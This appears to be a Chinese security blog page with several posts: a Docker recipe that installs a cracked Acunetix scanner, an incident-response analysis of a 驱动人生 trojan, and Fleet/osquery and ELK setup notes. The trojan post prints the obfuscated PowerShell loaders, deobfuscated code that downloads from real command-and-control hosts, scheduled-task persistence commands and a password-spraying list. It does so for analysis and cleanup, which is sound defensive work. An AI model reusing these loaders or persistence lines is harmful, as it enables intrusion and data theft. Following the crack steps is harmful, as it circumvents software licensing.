docker下运行Awvs的方式

发布时间:May 12, 2019 // 分类:运维工作,工作日志,开发笔记,linux,生活琐事 // No Comments

构造docker版本是因为docker的便携性,还有就是acunetix在centos下安装会出问题

提示需要激活,不能试用,所以弄了个docker破解版本

docker很便携,可以在mac上搞一下试试,这样就不用在pd安装ubuntu来安装linux版本的了。

docker的优点这里就不说了,如何安装docker

首先我们需要在ubuntu下来跑这个脚本,所以ubuntu肯定是需要的。还需要用到acunetix_trial.sh和patch_awvs

acunetix_trial.sh是安装程序
patch_awvs 是破解补丁

由于执行acunetix_trial.sh的时候需要各种回车,这里给一个自动安装的脚本,需要依赖于expect

#!/usr/bin/expect -f
# install.expect 
# auto install acunetix_trial

set timeout -1
set send_human {.1 .3 1 .05 2}

spawn bash /tmp/acunetix_trial.sh

# expect "press ENTER to continue\r"
expect ">>>"

send -h "\r\n"
send -h "\x03"

expect "Accept the license terms?"
send -h "yes\r"

expect "Insert new hostname, or leave blank to use"
send -h "\r"

expect "Email:"
send -h "awvs@gmail.com\r"
expect "Password:"
send -h "awvs@0day5.com\r"
expect "Password again:"
send -h "awvs@0day5.com\r"
expect eof

执行后会自动安装,并且配置账户为awvs@gmail.com,密码是awvs@0day5.com

这里咱们使用两个方式来构建docker运行的方式。一个是直接写进docker里面,等到运行后再调用。一个是直接封装到docker,然后在使用from awvs来获取封装后的镜像

编写的Dockerfile内容如下

FROM ubuntu:16.04

RUN apt-get update && \
    apt-get -y install apt-utils libxdamage1 libgtk-3-0 libasound2 libnss3 libxss1 bzip2 wget net-tools expect libx11-xcb-dev dbus curl sudo
    ADD patch_awvs /tmp/patch_awvs
    ADD install.expect /tmp/install.expect
    ADD acunetix_trial.sh /tmp/acunetix_trial.sh
    RUN cd /tmp && chmod +x /tmp/acunetix_trial.sh
    RUN cd /tmp && chmod +x /tmp/install.expect && /tmp/install.expect
    RUN cp /tmp/patch_awvs /home/acunetix/.acunetix_trial/v_190515149/scanner/patch_awvs
    CMD su -l acunetix -c /home/acunetix/.acunetix_trial/start.sh

构造镜像

docker build -t awvs .

跑起来

docker run -ti -p 8881:13443 awvs

然后执行

su -l acunetix
bash
cd /home/acunetix/.acunetix_trial
sh start.sh
exit
exit
# 必须先运行acunetix,才能找到sign
cd /home/acunetix/.acunetix_trial/v_190515149/scanner/ && chmod +x patch_awvs && ./patch_awvs
chattr +i /home/acunetix/.acunetix_trial/data/license/license_info.json

访问https://127.0.0.1:8881 登录
账号是:awvs@gmail.com
密码是:awvs@0day5.com
当然账户和密码都可以在install.expect里面修改

还有一种比较稳,就是先一步一步来构建好awvs镜像后,直接用docker启动

宿主机

docker run -ti --name=awvs -v $(pwd):/tmp/awvs ubuntu:16.04

acunetix_trial.shpatch_awvs 放到宿主机 /tmp/awvs 目录下

进入容器内

apt-get update && apt-get install sudo libxdamage1 libgtk-3-0 libasound2 libnss3 libxss1 libx11-xcb-dev -y
chmod +x /tmp/awvs/install.expect
chmod +x /tmp/awvs/acunetix_trial.sh
bash  /tmp/awvs/install.expect
cp /tmp/awvs/patch_awvs /home/acunetix/.acunetix_trial/v_190515149/scanner/
su -l acunetix
bash
cd /home/acunetix/.acunetix_trial
sh start.sh
exit
exit
cd /home/acunetix/.acunetix_trial/v_190515149/scanner/
chmod +x patch_awvs
./patch_awvs
chattr +i /home/acunetix/.acunetix_trial/data/license/license_info.json

回到宿主机

docker commit awvs awvs
touch Dockerfile

Dockerfile 内容

FROM awvs
LABEL MAINTAINER=snaker
ENV TZ=Asia/Shanghai
EXPOSE 13443
WORKDIR /home/acunetix/.acunetix_trial
USER acunetix
CMD ["/bin/bash", "start.sh"]

创建镜像

docker build -t awvs:latest -f Dockerfile .

启动镜像

docker run -ti -p 8881:13443 -d awvs

打开浏览器访问https://127.0.0.1:8881进行登录
账号是:awvs@gmail.com
密码是:awvs@0day5.com

如果要存出镜像到本地文件,可以使用docker save命令。例如,存出本地的awvs:latest镜像为文件awvs.tar:

$ docker save -o ./awvs.tar awvs:latest

导入镜像
可以使用docker load从存出的本地文件中再导入到本地镜像库,例如从文件awvs.tar导入镜像到本地镜像列表,如下所示:

$ docker load --input awvs.tar

驱动人生某样本分析

发布时间:March 10, 2019 // 分类:运维工作,linux,windows // No Comments

今日某应急中遭遇到了驱动人生木马,对其中对一个powershell脚本进行了分析,发现挺有意思对 。该后门在原本的基础上进行了延伸,除了常规的内网端口扫描,smb弱口令爆破,hash传递攻击还加入了17010漏洞扫描的功能。

利用某大佬的话来说。由于木马是样本都是不落地的方式,核心技术是通过定时计划任务执行powershell代码达到持续控制的目的,因此最先分析powershell代码,了解它做了哪些动作,指定查杀手段。

最初的时候是发现在计划任务里面有一个

powershell" -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=

对其进行解密

echo SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA= |base64 -D

IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)%

主要是获取当前的机器名称来匹配http://v.beahh.com/v{name} 。随意构造一个来获取

Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

需要对这串看不懂的东西进程解密。在powershell里面Invoke-Expression是可以把任何字符都当成PowerShell脚本来执行。确实是创建动态执行的好东西。直接更改Invoke-Expression为Write-Host即可.(有些类似于php里面的万能的echo)

解密出来发现还是被加密了

着重看后面的

Gqw+Gqw{)1- tg- )','
4FX4FX = valfs]gnirGqw+Gqwts[Gqw((b3P) ; [aRray]::reverse( ( VARiABlE (Gqw7XP8Gqw+Gqw0','GqwuCteG::]ytitnedIswodniW.lapicni')).RePlacE(([CHaR]97+[CHaR]99+[CHaR]68),'|').RePlacE(([CHaR]98+[CHaR]51+[CHaR]80),[strING][CHaR]34).RePlacE('0VP',[s
trING][CHaR]36).RePlacE(([CHaR]71+[CHaR]113+[CHaR]119),[strING][CHaR]39)|&((get-varIAblE '*MDR*').NAme[3,11,2]-joIn'')

在powershell里面执行了一次

PS >((get-varIAblE '*MDR*').NAme[3,11,2]-joIn'')
iex

既然是iex就好办了。继续输出Write-Host

4FX4FX = valfs]gnirGqw+Gqwts[Gqw((b3P) ; [aRray]::reverse( ( VARiABlE (Gqw7XP8Gqw+Gqw0','GqwuCteG::]ytitnedIswodniW.lapicni')).RePlacE(([CHaR]97+[CHaR]99+[CHaR]68),'|').RePlacE(([CHaR]98+[CHaR]51+[CHaR]80),[strING][CHaR]34).RePlacE('0VP',[strING][CHaR]36).RePlacE(([CHaR]71+[CHaR]113+[CHaR]119),[strING][CHaR]39)|& Write-Host


仔细观察了半天,发现这个( $eNV:cOmSpec[4,24,25]-JoIN'')里面的env很可疑,应该是一个获取系统环境变量的东西。继续在powershell运行查看是什么

好吧,还是iex.既然是iex就好办了。继续输出Write-Host

4FX4FX = valfs]gnir'+'ts['((") ; [aRray]::reverse( ( VARiABlE ('7XP8'+'0') -VA )) ;
Write-Host ( " $( $ofS ='') " + [stRiNG](( VARiABlE ('7XP8'+'0') -VA ) )+" $( SEt-ITEM 'VariABLE:OFs'  ' ' ) " ) 

执行后明显可以看到一些东西了。比如创建任务和下载东西

但是被混淆了。还需要继续解密。

') -CREplace  'sfl',[CHAR]36 -CREplace '8ex',[CHAR]124 -REPlaCE  'XF4',[CHAR]34-CREplace  'rpK',[CHAR]39 -CREplace([CHAR]104+[CHAR]56+[CHAR]65),[CHAR]92) | .( $ShelLiD[1]+$sHELlid[13]+'X')

主要是这个.( $ShelLiD[1]+$sHELlid[13]+'X')长的太像iex了。只是更改试试

果不其然,还是iex.继续继续输出Write-Host

') -CREplace  'sfl',[CHAR]36 -CREplace '8ex',[CHAR]124 -REPlaCE  'XF4',[CHAR]34-CREplace  'rpK',[CHAR]39 -CREplace([CHAR]104+[CHAR]56+[CHAR]65),[CHAR]92) | Write-Host

执行后成功的拿到了没有混淆的源码

[string]$av = ""
[string]$avs = ""
[string]$log1 = ""
[string]$log2 = ""
[string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
$avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName
if($avs.GetType().name.IndexOf('Object') -gt -1){
    for($v = 0; $v -lt $avs.Count; $v++){
        $av += $avs[$v] + "|"
    }
}else{
$av = $avs
}
try{
    if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){
        $av += 'ZDFY'
    }
}catch{}
#[System.Threading.Thread]::Sleep((Get-Random -Minimum 10000 -Maximum 100000))
$path = "$env:temp\\ppppp.log"
[string]$flag = test-path $path
try{
$log1 = (Get-EventLog -LogName 'Security' -After (get-date).AddDays(-7) -befor (get-date).AddDays(-3)).length
$log2 = (Get-EventLog -LogName 'Security' -After (get-date).AddDays(-2)).length
}catch{}
$key = "&mac="+$mac+"&av="+$av+"&ver="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME + "&log1=" + $log1 + "&log2=" + $log2
if($flag -eq 'False'){
    try{
        $file = "$env:appdata\\Microsoft\\cred.ps1"
        $size = (Get-ChildItem $file -recurse | Measure-Object -property length -sum).sum
        if($size -ne 2997721){
            $url = 'http://27.102.107.137/new.dat?pebb' + $key
            (New-Object System.Net.WebClient).DownloadFile($url,"$file")
            $size2 = (Get-ChildItem $file -recurse | Measure-Object -property length -sum).sum
            if($size2 -eq 2997721){
                $status = 'add_ok'
                if (([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")){
                &cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 60 /st 07:00:00 /tn Credentials /tr "powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1" /F
                }else{
                &cmd.exe /c schtasks /create /sc MINUTE /mo 60 /st 07:00:00 /tn Credentials /tr "powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1" /F
                }
            }else{$status = 'error'}

        }else{      $status = 'old1'        }       New-Item $path -type file   }catch{}}else{$status = 'old2'}
try{    $download = 'http://27.102.107.137/status.json?pebb' + $key  + "&" + $status  + "&" + $MyInvocation.MyCommand.Definition    IEX (New-Object Net.WebClient).DownloadString("$download")}catch{}
try{
    &cmd.exe /c schtasks /delete /tn "\Microsoft\Credentials" /f
}catch{}
[System.Threading.Thread]::Sleep(3000)
Stop-Process -Force -processname powershell

主要的功能是获取当前的mac地址等基本信息,然后检测是不是存在360主动防御服务等类似的防病毒软件。然后下载http://27.102.107.137/new.dat 到本地appdata\Microsoft\cred.ps1。添加计划任务Credentials和\Microsoft\Credentials。

紧接着对http://27.102.107.137/status.json 进行分析,使用同样的方式进行还原。

[string]$av = ""[string]$avs = ""[string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)$avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayNameif($avs.GetType().name.IndexOf('Object') -gt -1)    for($v = 0; $v -lt $avs.Count; $v++){       $av += $avs[$v] + "|"   }}else{$av = $avs}try{  if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){       $av += 'ZDFY'   }}catch{}$path1 = "$env:temp\\ddd.tmp"[string]$ddd = test-path $path1$status = 'problem'$key = "&mac="+$mac+"&av="+$av+"&ver="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME + "&kill=" + $tkill + "&status="if($av.IndexOf("ZDFY") -ne -1){  $status = 'ZDFY'}elseif(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") -and ($ddd -eq 'False')){   try{        New-Item $path1 -type file      $url = 'http://27.102.107.137/ddd.png?p=ddd' + $key     $pname = -join ([char[]](97..122) | Get-Random -Count (Get-Random -Minimum 4 -Maximum 8))       $pnamepath = $pname + '.exe'        $pnamepath = "$env:SystemRoot\" + $pnamepath        $wc = New-Object System.Net.WebClient       $wc.DownloadFile($url, $pnamepath)      $status = 'error'       $dsize = (Get-ChildItem $pnamepath -Force -recurse | Measure-Object -property length -sum).sum      if($dsize -eq '1634984'){       &cmd.exe /c schtasks /create /ru SYSTEM /sc MINUTE /mo 30 /st 07:00:00 /tn "\Microsoft\Windows\Location\$pname" /tr "$pnamepath" /F     $status = 'addok'       }   }catch{}}elseif($ddd -ne 'False'){  $status = 'old'}else{   $status = 'Low'}New-Item $path1 -type filetry{  $download = 'http://27.102.107.137/ddd.json?p=ddd' + $key + $status IEX (New-Object Net.WebClient).DownloadString("$download")  &cmd.exe /c schtasks /delete /tn "\Microsoft\Credentials" /f}catch{}

利用同样的方式还原了http://27.102.107.137/new.dat

其中的一个base64里面包含了添加任务和端口策略的脚本

cmd.exe /c netsh.exe firewall add portopening tcp 65533 DNS&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn  "\Microsoft\windows\Bluetooths" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AZQBiAD8AMwAyACcAKQA=

cmd.exe /c netsh.exe firewall add portopening tcp 65533 DNS&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn  "\Microsoft\windows\Bluetooths" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AZQBiAD8ANgA0ACcAKQA=" /F


然后对10/172/192.168三个段特别上心。不然就访问https://api.ipify.org/ 获取公网Ip进行扫描
自带的弱口令

WmicUSER = @("administrator")
allpass = @("123456","password","PASSWORD","football","welcome","1","12","21","123","321","1234","12345","123123","123321","111111","654321","666666","121212","000000","222222","888888","1111","555555","1234567","12345678","123456789","987654321","admin","abc123","abcd1234","abcd@1234","abc@123","p@ssword","P@ssword","p@ssw0rd","P@ssw0rd","P@SSWORD","P@SSW0RD","P@$$w0rd","P@$$word","P@$$w0rd","iloveyou","monkey","login","passw0rd","master","hello","qazwsx","password1","qwerty","baseball","qwertyuiop","superman","1qaz2wsx","fuckyou","123qwe","zxcvbn","pass","aaaaaa","love","administrator")

内置了17010漏洞扫描

主要是学会了学会了不同的iex写法

PS C:\Users\Administrator\Desktop> ((get-varIAblE '*MDR*').NAme[3,11,2]-joIn'')
iex
PS C:\Users\Administrator\Desktop> ( $eNV:cOmSpec[4,24,25]-JoIN'')
iex
PS C:\Users\Administrator\Desktop> ( $ShelLiD[1]+$sHELlid[13]+'X')
ieX
PS C:\Users\Administrator\Desktop> $pname = -join ([char[]](97..122) | Get-Random -Count (Get-Random -Minimum 4 -Maximum 8))
PS C:\Users\Administrator\Desktop> $pname
wvhni
PS C:\Users\Administrator\Desktop> ((vaRIABlE '*MDR*').NAme[3,11,2]-JoIn'')
iex
PS C:\Users\Administrator\Desktop> .( $pSHoME[4]+$pshOME[34]+'X')

cmdlet Invoke-Expression at command pipeline position 1
Supply values for the following parameters:
Command: .( $pSHoME[4]+$pshOME[34]+'X')
PS C:\Users\Administrator\Desktop> ( $pSHoME[4]+$pshOME[34]+'X')
ieX

相关的计划任务差不多齐了,清理掉

schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn  "\Microsoft\windows\Bluetooths" /tr 

schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn  "\Microsoft\windows\Bluetooths" /tr 

schtasks /create /sc MINUTE /mo 60 /st 07:00:00 /tn Credentials /tr "powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1"

schtasks /create /ru SYSTEM /sc MINUTE /mo 30 /st 07:00:00 /tn "\Microsoft\Windows\Location\$pname" /tr "$pnamepath" /F

需要清理掉相关文件如下

\AppData\Roaming\sign.txt
\AppData\Roaming\flashplayer.tmp
\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat
\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk
%systemroot%\xxx.exe[xxx为随机数]`[-join ([char[]](97..122) | Get-Random -Count (Get-Random -Minimum 4 -Maximum 8))]`

提供解密后的部分下载
new.dat
status.json
v

Kolide Fleet osquery体验

发布时间:December 17, 2018 // 分类:运维工作,工作日志,开发笔记,linux,windows // No Comments

fleet Osquery体验

Kolide Fleet是为安全专家量身打造的最先进的主机监控平台。利用Facebook久经考验的osquery项目,Kolide能够快速回答重大问题。要了解更多关于Kolide Fleet的信息,请访问https://kolide.com/fleet 【都是xxx翻译的】说的直白一点就是一个信息汇聚实时查询系统

0x00.fleet准备

根据官方的提示,可以自行安装golang环境或者使用官方提供的编译好的程序。这里主要是为了方便,解决一些依赖问题啥的。直接利用官方提供的编译好的二进程程序。

$ wget https://dl.kolide.co/bin/fleet_latest.zip
$ unzip fleet_latest.zip 'linux/*' -d fleet
$ sudo cp fleet/linux/fleet* /usr/bin/

由于fleet依赖于mysql以及redis,所以需要安装mysql和redis
要安装MySQL服务器文件,请运行以下命令

$ wget https://repo.mysql.com/mysql57-community-release-el7.rpm
$ sudo rpm -i mysql57-community-release-el7.rpm
$ sudo yum update
$ sudo yum install mysql-server

要启动MySQL服务:

$ sudo systemctl start mysqld

假如我们需要对数据库进行增删改操作,需要修改默认的数据库密码。安装的时候自动生成的数据库密码在/var/log/mysqld.log中。连接mysql并更改密码后需要重新启动mysql服务

mysql> ALTER USER "root"@"localhost" IDENTIFIED BY "toor?Fl33t";
mysql> flush privileges;
mysql> exit

停止MySQL并重新开始

$ sudo mysqld stop  
$ sudo systemctl start mysqld

然后创建一个数据库给fleet使用。

$ echo 'CREATE DATABASE kolide;' | mysql -u root -p

要安装Redis服务器文件,请运行以下命令:

$ wget http://download.redis.io/redis-stable.tar.gz
$ tar zxf redis-stable.tar.gz
$ cd redis-stable
$ make 
$ make install
$ cp redis.conf /etc/redis.conf
$ redis-server /etc/redis.conf

0x01.fleet安装配置

现在我们已经安装了Fleet,MySQL和Redis,在运行fleet之前需要对数据进行初始化

$ /usr/bin/fleet prepare db \
    --mysql_address=127.0.0.1:3306 \
    --mysql_database=kolide \
    --mysql_username=root \
    --mysql_password=toor?Fl33t

如果没有错误的话,会提示初始化完成Migrations completed.
在我们运行服务器之前,我们需要生成一些TLS密钥材料。如果您已经拥有生成有效TLS证书的工具,那么建议您使用它。您将需要TLS证书和密钥来运行Fleet服务器。如果您想生成自签名证书,可以通过以下方式执行此操作:

$ openssl genrsa -out /tmp/server.key 4096
$ openssl req -new -key /tmp/server.key -out /tmp/server.csr
$ openssl x509 -req -days 366 -in /tmp/server.csr -signkey /tmp/server.key -out /tmp/server.cert

通过如下的命令启动fleet

$ /usr/bin/fleet serve \
  --mysql_address=127.0.0.1:3306 \
  --mysql_database=kolide \
  --mysql_username=root \
  --mysql_password=toor?Fl33t \
  --redis_address=127.0.0.1:6379 \
  --server_cert=/tmp/server.cert \
  --server_key=/tmp/server.key \
  --logging_json \
  --auth_jwt_key h8IMf9Y7R5YxSS0bN6tsLV8aNehn/qHX

如果不加auth_jwt_key好像不能运行,程序会打印出一个随机码,如果加auth_jwt_key运行后程序提示在808端口上运行成功。然后访问https://ip:8080 输入一些配置信息就可以成功到界面

0x02.Osquery安装配置

Osquery的安装根据官方提供的下载地址进行安装。也可以根据fleet程序提供的安装说明进行安装.

需要对Osquery配置的就两个地方,一个是fleet的证书【tls_server_certs】和密钥【enroll_secret_path】。来源是添加主机的时候的两个地方

--enroll_secret_path=/opt/osquery/secret.pem
--tls_hostname=fleet的地址,省去https://
--tls_server_certs=/opt/osquery/fleet.pem
--host_identifier=uuid
--enroll_tls_endpoint=/api/v1/osquery/enroll
--config_plugin=tls
--config_tls_endpoint=/api/v1/osquery/config
--config_tls_refresh=10
--disable_distributed=false
--distributed_plugin=tls
--distributed_interval=10
--distributed_tls_max_attempts=3
--distributed_tls_read_endpoint=/api/v1/osquery/distributed/read
--distributed_tls_write_endpoint=/api/v1/osquery/distributed/write
--logger_plugin=tls
--logger_tls_endpoint=/api/v1/osquery/log
--logger_tls_period=10


启动的时候以命令

$ osqueryd --flagfile=/opt/osquery/osquery.flag


运行成功后在fleet会看到相关的主机连接信息

windows也是通过相同的配置连接到fleet

--enroll_secret_path=c:\ProgramData\osquery\certs\certs.pem
--tls_hostname=192.168.87.232:8080
--tls_server_certs=c:\ProgramData\osquery\certs\192.168.87.232_8080.pem
--host_identifier=uuid
--enroll_tls_endpoint=/api/v1/osquery/enroll
--config_plugin=tls
--config_tls_endpoint=/api/v1/osquery/config
--config_tls_refresh=10
--disable_distributed=false
--distributed_plugin=tls
--distributed_interval=10
--distributed_tls_max_attempts=3
--distributed_tls_read_endpoint=/api/v1/osquery/distributed/read
--distributed_tls_write_endpoint=/api/v1/osquery/distributed/write
--logger_plugin=tls
--logger_tls_endpoint=/api/v1/osquery/log
--logger_tls_period=10

0x03.fleet使用

fleet就很简单,类似一个在线的osqueryi

SELECT p.pid, name, p.path as process_path, pf.path as open_path FROM osquery_info i JOIN processes p ON p.pid = i.pid JOIN process_open_files pf ON pf.pid = p.pid  WHERE pf.path LIKE '/dev/%';

利用beat对系统进行监控

发布时间:December 10, 2018 // 分类:运维工作,开发笔记,linux,windows,生活琐事 // No Comments

主要是利用winlogbeat和auditbeat进行监控

关于安装elk.自行更新到最新版本

wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.4.2.rpm
wget https://artifacts.elastic.co/downloads/kibana/kibana-6.4.2-x86_64.rpm
wget https://artifacts.elastic.co/downloads/logstash/logstash-6.4.2.rpm

rpm -ivh elasticsearch-6.4.2.rpm 
sudo chkconfig --add elasticsearch
/etc/init.d/elasticsearch start

rpm -ivh kibana-6.4.2-x86_64.rpm 
/etc/init.d/kibana start
sudo chkconfig --add kibana

